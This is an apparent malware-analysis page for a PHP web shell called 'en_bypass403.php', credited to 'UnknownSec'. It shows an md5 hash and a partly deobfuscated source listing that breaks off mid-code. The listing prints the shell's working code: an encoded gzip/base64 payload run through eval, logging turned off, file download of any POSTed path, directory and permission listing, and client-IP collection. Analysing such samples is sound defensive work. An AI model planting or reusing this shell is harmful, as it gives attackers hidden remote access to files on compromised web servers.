PHP Malware Analysis

en_bypass403.php

md5: 2574897d64a05bc06d31cbcde065c6f2

Jump to:

Screenshot


Attributes

Emails

Encoding

Environment

Execution

Files

Input

Title
  • ".$_SERVER[\'HTTP_HOST\']." - $_n (Traces)
  • localhost - UnknownSec (HTML)

URLs


Deobfuscated PHP code

<?php

/* [email protected] */
set_time_limit(0);
error_reporting(0);
@ini_set('error_log', null);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@ini_set('output_buffering', 0);
@ini_set('display_errors', 0);
$SISTEMIT_COM_ENC = "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";
$rand = "JG5hdiA9IGd6aW5mbGF0ZShiYXNlNjRfZGVjb2RlKCRTSVNURU1JVF9DT01fRU5DKSk7DQoJCQkkc3RyID0gWyf1Jywn6ycsJ+MnLCf7Jywn4ScsJ/EnLCfmJywn7ScsJ/0nLCfqJywntSddOw0KCQkJJHJwbGMgPVsnYScsJ2knLCd1JywnZScsJ28nLCdkJywncycsJ2gnLCd2JywndCcsJyAnXTsNCgkJICAgICRuYXYgPSBzdHJfcmVwbGFjZSgkc3RyLCRycGxjLCRuYXYpOw0KCQkJZXZhbCgkbmF2KTs=";
eval /* PHPDeobfuscator eval output */ {
    $nav = "\r\n\xf1\xf5\xea\xfb_\xf1\xfbf\xf5\xe3l\xea_\xea\xebm\xfbz\xe1n\xfb_\xe6\xfb\xea('A\xe6\xeb\xf5/J\xf5k\xf5r\xea\xf5');\r\n\$_n\xb5=\xb5'Unkn\xe1wnS\xfbc';\r\n\$_\xe6\xb5=\xb5\"<\xe6\xeayl\xfb>\xea\xf5bl\xfb{\xf1\xeb\xe6pl\xf5y:n\xe1n\xfb;}</\xe6\xeayl\xfb><\xf1\xeb\xfd\xb5cl\xf5\xe6\xe6='\xea\xf5bl\xfb-r\xfb\xe6p\xe1n\xe6\xeb\xfd\xfb'><\xedr></\xf1\xeb\xfd>\";\r\n\$_r\xb5=\xb5\"r\xfbq\xe3\xebr\xfb\xf1='r\xfbq\xe3\xebr\xfb\xf1'\";\r\n\$_x\xb5=\xb5\"<\xeb\xb5cl\xf5\xe6\xe6='b\xeb\xb5b\xeb-g\xfb\xf5r-f\xebll'></\xeb>\";\r\n\xebf(\xeb\xe6\xe6\xfb\xea(\$_GET['\xe1p\xea\xeb\xe1n'])\xb5&&\xb5\$_POST['\xe1p\xea']\xb5==\xb5'\xf1\xe1wnl\xe1\xf5\xf1'){\r\n\t\xed\xfb\xf5\xf1\xfbr('C\xe1n\xea\xfbn\xea-\xeayp\xfb:\xb5\xea\xfbx\xea/pl\xf5\xebn');\r\n\t\xed\xfb\xf5\xf1\xfbr('C\xe1n\xea\xfbn\xea-D\xeb\xe6p\xe1\xe6\xeb\xea\xeb\xe1n:\xb5\xf5\xea\xea\xf5c\xedm\xfbn\xea;\xb5f\xebl\xfbn\xf5m\xfb=\"'.\$_POST['n\xf5m\xfb'].'\"');\r\n\xfbc\xed\xe1(f\xebl\xfb_g\xfb\xea_c\xe1n\xea\xfbn\xea\xe6(\$_POST['p\xf5\xea\xed']));\r\n\xfbx\xeb\xea();\r\n}\r\nf\xe3nc\xea\xeb\xe1n\xb5\xe2\x96\x9f(\$\xf1\xebr,\$p)\xb5{\r\n\xebf(\xeb\xe6\xe6\xfb\xea(\$_GET['p\xf5\xea\xed']))\xb5{\r\n\t\$\xe2\x96\x9a\xb5=\xb5\$_GET['p\xf5\xea\xed'];\r\n}\xb5\xfbl\xe6\xfb\xb5{\r\n\t\$\xe2\x96\x9a\xb5=\xb5g\xfb\xeacw\xf1();\r\n}\r\n\xebf(\xeb\xe6_wr\xeb\xea\xf5bl\xfb(\$\xe2\x96\x9a))\xb5{\r\n\tr\xfb\xea\xe3rn\xb5\"<gr>\".\$p.\"</gr>\";\r\n}\xb5\xfbl\xe6\xfb\xb5{\r\n\tr\xfb\xea\xe3rn\xb5\"<r\xf1>\".\$p.\"</r\xf1>\";\r\n\t}\r\n}\r\nf\xe3nc\xea\xeb\xe1n\xb5\xe1k(){\r\n\t\xfbc\xed\xe1\xb5'<\xf1\xeb\xfd\xb5cl\xf5\xe6\xe6=\"\xf5l\xfbr\xea\xb5\xf5l\xfbr\xea-\xe6\xe3cc\xfb\xe6\xe6\xb5\xf5l\xfbr\xea-\xf1\xeb\xe6m\xeb\xe6\xe6\xebbl\xfb\xb5f\xf5\xf1\xfb\xb5\xe6\xed\xe1w\xb5my-3\"\xb5r\xe1l\xfb=\"\xf5l\xfbr\xea\"><b\xe3\xea\xea\xe1n\xb5\xeayp\xfb=\"b\xe3\xea\xea\xe1n\"\xb5cl\xf5\xe6\xe6=\"b\xean-cl\xe1\xe6\xfb\"\xb5\xf1\xf5\xea\xf5-b\xe6-\xf1\xeb\xe6m\xeb\xe6\xe6=\"\xf5l\xfbr\xea\"\xb5\xf5r\xeb\xf5-l\xf5b\xfbl=\"Cl\xe1\xe6\xfb\"></b\xe3\xea\xea\xe1n>';\r\n}\r\nf\xe3nc\xea\xeb\xe1n\xb5\xfbr(){\r\n\t\xfbc\xed\xe1\xb5'<\xf1\xeb\xfd\xb5cl\xf5\xe6\xe6=\"\xf5l\xfbr\xea\xb5\xf5l\xfbr\xea-\xf1\xf5ng\xfbr\xb5\xf5l\xfbr\xea-\xf1\xeb\xe6m\xeb\xe6\xe6\xebbl\xfb\xb5f\xf5\xf1\xfb\xb5\xe6\xed\xe1w\xb5my-3\"\xb5r\xe1l\xfb=\"\xf5l\xfbr\xea\"><b\xe3\xea\xea\xe1n\xb5\xeayp\xfb=\"b\xe3\xea\xea\xe1n\"\xb5cl\xf5\xe6\xe6=\"b\xean-cl\xe1\xe6\xfb\"\xb5\xf1\xf5\xea\xf5-b\xe6-\xf1\xeb\xe6m\xeb\xe6\xe6=\"\xf5l\xfbr\xea\"\xb5\xf5r\xeb\xf5-l\xf5b\xfbl=\"Cl\xe1\xe6\xfb\"></b\xe3\xea\xea\xe1n>';\r\n}\r\nf\xe3nc\xea\xeb\xe1n\xb5\xe6z(\$by\xea){\r\n\t\$\xe6z\xb5=\xb5\xf5rr\xf5y('B',\xb5'KB',\xb5'MB',\xb5'GB',\xb5'TB');\r\n\tf\xe1r(\$\xeb\xb5=\xb50;\xb5\$by\xea\xb5>=\xb51024\xb5&&\xb5\$\xeb\xb5<\xb5(c\xe1\xe3n\xea(\$\xe6z)\xb5-1\xb5);\xb5\$by\xea\xb5/=\xb51024,\xb5\$\xeb++\xb5);\r\n\tr\xfb\xea\xe3rn(r\xe1\xe3n\xf1(\$by\xea,2).\"\xb5\".\$\xe6z[\$\xeb]);\r\n}\r\nf\xe3nc\xea\xeb\xe1n\xb5\xebp()\xb5{\r\n\t\$\xebp\xf5\xe6\xb5=\xb5'';\r\n\xebf(g\xfb\xea\xfbn\xfd('HTTP_CLIENT_IP'))\r\n\t\$\xebp\xf5\xe6\xb5=\xb5g\xfb\xea\xfbn\xfd('HTTP_CLIENT_IP');\r\n\xfbl\xe6\xfb\xb5\xebf(g\xfb\xea\xfbn\xfd('HTTP_X_FORWARDED_FOR'))\r\n\t\$\xebp\xf5\xe6\xb5=\xb5g\xfb\xea\xfbn\xfd('HTTP_X_FORWARDED_FOR');\r\n\xfbl\xe6\xfb\xb5\xebf(g\xfb\xea\xfbn\xfd('HTTP_X_FORWARDED'))\r\n\t\$\xebp\xf5\xe6\xb5=\xb5g\xfb\xea\xfbn\xfd('HTTP_X_FORWARDED');\r\n\xfbl\xe6\xfb\xb5\xebf(g\xfb\xea\xfbn\xfd('HTTP_FORWARDED_FOR'))\r\n\t\$\xebp\xf5\xe6\xb5=\xb5g\xfb\xea\xfbn\xfd('HTTP_FORWARDED_FOR');\r\n\xfbl\xe6\xfb\xb5\xebf(g\xfb\xea\xfbn\xfd('HTTP_FORWARDED'))\r\n\t\$\xebp\xf5\xe6\xb5=\xb5g\xfb\xea\xfbn\xfd('HTTP_FORWARDED');\r\n\xfbl\xe6\xfb\xb5\xebf(g\xfb\xea\xfbn\xfd('REMOTE_ADDR'))\r\n\t\$\xebp\xf5\xe6\xb5=\xb5g\xfb\xea\xfbn\xfd('REMOTE_ADDR');\r\n\xfbl\xe6\xfb\r\n\t\$\xebp\xf5\xe6\xb5=\xb5'IP\xb5\xea\xeb\xf1\xf5k\xb5\xf1\xebk\xfbn\xf5l\xeb';\r\nr\xfb\xea\xe3rn\xb5\$\xebp\xf5\xe6;\r\n}\r\nf\xe3nc\xea\xeb\xe1n\xb5p(\$f\xebl\xfb){\r\n\xebf(\$p\xb5=\xb5@f\xebl\xfbp\xfbrm\xe6(\$f\xebl\xfb)){\r\n\t\$\xeb\xb5=\xb5'\xe3';\r\n\xebf((\$p\xb5&\xb50xC000)\xb5==\xb50xC000)\$\xeb\xb5=\xb5'\xe6';\r\n\xfbl\xe6\xfb\xebf((\$p\xb5&\xb50xA000)\xb5==\xb50xA000)\$\xeb\xb5=\xb5'l';\r\n\xfbl\xe6\xfb\xebf((\$p\xb5&\xb50x8000)\xb5==\xb50x8000)\$\xeb\xb5=\xb5'-';\r\n\xfbl\xe6\xfb\xebf((\$p\xb5&\xb50x6000)\xb5==\xb50x6000)\$\xeb\xb5=\xb5'b';\r\n\xfbl\xe6\xfb\xebf((\$p\xb5&\xb50x4000)\xb5==\xb50x4000)\$\xeb\xb5=\xb5'\xf1';\r\n\xfbl\xe6\xfb\xebf((\$p\xb5&\xb50x2000)\xb5==\xb50x2000)\$\xeb\xb5=\xb5'c';\r\n\xfbl\xe6\xfb\xebf((\$p\xb5&\xb50x1000)\xb5==\xb50x1000)\$\xeb\xb5=\xb5'p';\r\n\t\$\xeb\xb5.=\xb5(\$p\xb5&\xb500400)?\xb5'r':'-';\r\n\t\$\xeb\xb5.=\xb5(\$p\xb5&\xb500200)?\xb5'w':'-';\r\n\t\$\xeb\xb5.=\xb5(\$p\xb5&\xb500100)?\xb5'x':'-';\r\n\t\$\xeb\xb5.=\xb5(\$p\xb5&\xb500040)?\xb5'r':'-';\r\n\t\$\xeb\xb5.=\xb5(\$p\xb5&\xb500020)?\xb5'w':'-';\r\n\t\$\xeb\xb5.=\xb5(\$p\xb5&\xb500010)?\xb5'x':'-';\r\n\t\$\xeb\xb5.=\xb5(\$p\xb5&\xb500004)?\xb5'r':'-';\r\n\t\$\xeb\xb5.=\xb5(\$p\xb5&\xb500002)?\xb5'w':'-';\r\n\t\$\xeb\xb5.=\xb5(\$p\xb5&\xb500001)?\xb5'x':'-';\r\nr\xfb\xea\xe3rn\xb5\$\xeb;\r\n\t}\r\n\t\xfbl\xe6\xfb\xb5r\xfb\xea\xe3rn\xb5\"-\xb5??\xb5-\";\r\n}\r\n\xfbc\xed\xe1\xb5\"\r\n<!DOCTYPE\xb5HTML>\r\n<\xed\xeaml>\r\n\t<\xed\xfb\xf5\xf1>\r\n\t\t<m\xfb\xea\xf5\xb5n\xf5m\xfb='\xf5\xe3\xea\xed\xe1r'\xb5c\xe1n\xea\xfbn\xea='\$_n'>\r\n\t\t<m\xfb\xea\xf5\xb5n\xf5m\xfb='r\xe1b\xe1\xea\xe6'\xb5c\xe1n\xea\xfbn\xea='n\xe1\xebn\xf1\xfbx,n\xe1f\xe1ll\xe1w'>\r\n\t\t<\xea\xeb\xeal\xfb>\".\$_SERVER['HTTP_HOST'].\"\xb5-\xb5\$_n</\xea\xeb\xeal\xfb>\r\n\t\t<m\xfb\xea\xf5\xb5n\xf5m\xfb='\xfd\xeb\xfbwp\xe1r\xea'\xb5c\xe1n\xea\xfbn\xea='w\xeb\xf1\xea\xed=\xf1\xfb\xfd\xebc\xfb-w\xeb\xf1\xea\xed,\xb5\xebn\xeb\xea\xeb\xf5l-\xe6c\xf5l\xfb=0.70'>\r\n\t\t<l\xebnk\xb5r\xfbl='\xe6\xeayl\xfb\xe6\xed\xfb\xfb\xea'\xb5\xedr\xfbf='//r\xf5n\xf1\xe1m-p\xedp.f\xeap.\xe6\xed/\xe6\xeayl\xfb.c\xe6\xe6'>\r\n\t\t<\xe6cr\xebp\xea\xb5\xe6rc='//c\xf1nj\xe6.cl\xe1\xe3\xf1fl\xf5r\xfb.c\xe1m/\xf5j\xf5x/l\xebb\xe6/pr\xeb\xe6m/1.6.0/pr\xeb\xe6m.j\xe6'></\xe6cr\xebp\xea>\r\n\t\t<\xe6cr\xebp\xea\xb5\xe6rc='//c\xf1n.j\xe6\xf1\xfbl\xeb\xfdr.n\xfb\xea/npm/b\xe1\xe1\xea\xe6\xear\[email protected]/\xf1\xeb\xe6\xea/j\xe6/b\xe1\xe1\xea\xe6\xear\xf5p.b\xe3n\xf1l\xfb.m\xebn.j\xe6'></\xe6cr\xebp\xea>\r\n\t\t<\xe6cr\xebp\xea\xb5\xe6rc='//c\xe1\xf1\xfb.jq\xe3\xfbry.c\xe1m/jq\xe3\xfbry-3.3.1.\xe6l\xebm.m\xebn.j\xe6'></\xe6cr\xebp\xea>\r\n\t</\xed\xfb\xf5\xf1>\r\n<\xe6\xeayl\xfb>\r\n.\xe6\xed\xfbll\xb5{\r\n\tb\xe1r\xf1\xfbr-r\xf5\xf1\xeb\xe3\xe6:\xb54px;\r\n\tb\xe1r\xf1\xfbr:\xb51px\xb5\xe6\xe1l\xeb\xf1\xb5rgb\xf5(255,\xb5255,\xb5255,\xb50.4);\r\n\tf\xe1n\xea-\xe6\xebz\xfb:\xb510p\xea;\r\n\t\xf1\xeb\xe6pl\xf5y:\xb5fl\xfbx;\r\n\tfl\xfbx-\xf1\xebr\xfbc\xea\xeb\xe1n:\xb5c\xe1l\xe3mn;\r\n\t\xf5l\xebgn-\xeb\xea\xfbm\xe6:\xb5\xe6\xear\xfb\xeac\xed;\r\n\tb\xf5ckgr\xe1\xe3n\xf1:\xb5#242424;\r\n\tc\xe1l\xe1r:\xb5#fff;\r\n}\r\n.pr\xfb\xb5{\r\n\t\xed\xfb\xebg\xed\xea:\xb5500px;\r\n\t\xe1\xfd\xfbrfl\xe1w:\xb5\xf5\xe3\xea\xe1;\r\n\tw\xed\xeb\xea\xfb-\xe6p\xf5c\xfb:\xb5pr\xfb-wr\xf5p;\r\n\tfl\xfbx-gr\xe1w:\xb51;\r\n\tm\xf5rg\xebn:10px\xb5\xf5\xe3\xea\xe1;\r\n\tp\xf5\xf1\xf1\xebng:10px;\r\n\tl\xebn\xfb-\xed\xfb\xebg\xed\xea:1.3\xfbm;\r\n\t\xe1\xfd\xfbrfl\xe1w-x:\xe6cr\xe1ll;\r\n}\r\n</\xe6\xeayl\xfb>\r\n<b\xe1\xf1y\xb5cl\xf5\xe6\xe6='bg-\xe6\xfbc\xe1n\xf1\xf5ry\xb5\xea\xfbx\xea-l\xebg\xed\xea'>\r\n<\xf1\xeb\xfd\xb5cl\xf5\xe6\xe6='c\xe1n\xea\xf5\xebn\xfbr-fl\xe3\xeb\xf1'>\r\n\t<\xf1\xeb\xfd\xb5cl\xf5\xe6\xe6='py-3'\xb5\xeb\xf1='m\xf5\xebn'>\r\n\t\t<\xf1\xeb\xfd\xb5cl\xf5\xe6\xe6='b\xe1x\xb5\xe6\xed\xf5\xf1\xe1w\xb5bg-\xf1\xf5rk\xb5p-4\xb5r\xe1\xe3n\xf1\xfb\xf1-3'>\r\n\t\t\t<\xf1\xeb\xfd\xb5cl\xf5\xe6\xe6='c\xe1rn\xfbr\xb5\xea\xfbx\xea-\xe6\xfbc\xe1n\xf1\xf5ry'>\xe6\xed\xfbll\xb5byp\xf5\xe6\xe6\xb5403</\xf1\xeb\xfd>\r\n\t\t\t\t<\xf5\xb5cl\xf5\xe6\xe6='\xea\xfbx\xea-\xf1\xfbc\xe1r\xf5\xea\xeb\xe1n-n\xe1n\xfb\xb5\xea\xfbx\xea-l\xebg\xed\xea'\xb5\xedr\xfbf='\".\$_SERVER['PHP_SELF'].\"'><\xed4>\$_n\xb5S\xed\xfbll</\xed4></\xf5>\";\r\n\t\t\t\t\xebf(\xeb\xe6\xe6\xfb\xea(\$_GET['p\xf5\xea\xed'])){\r\n\t\t\t\t\t\$p\xf5\xea\xed\xb5=\xb5\$_GET['p\xf5\xea\xed'];\r\n\t\t\t\t}\xb5\xfbl\xe6\xfb\xb5{\r\n\t\t\t\t\t\$p\xf5\xea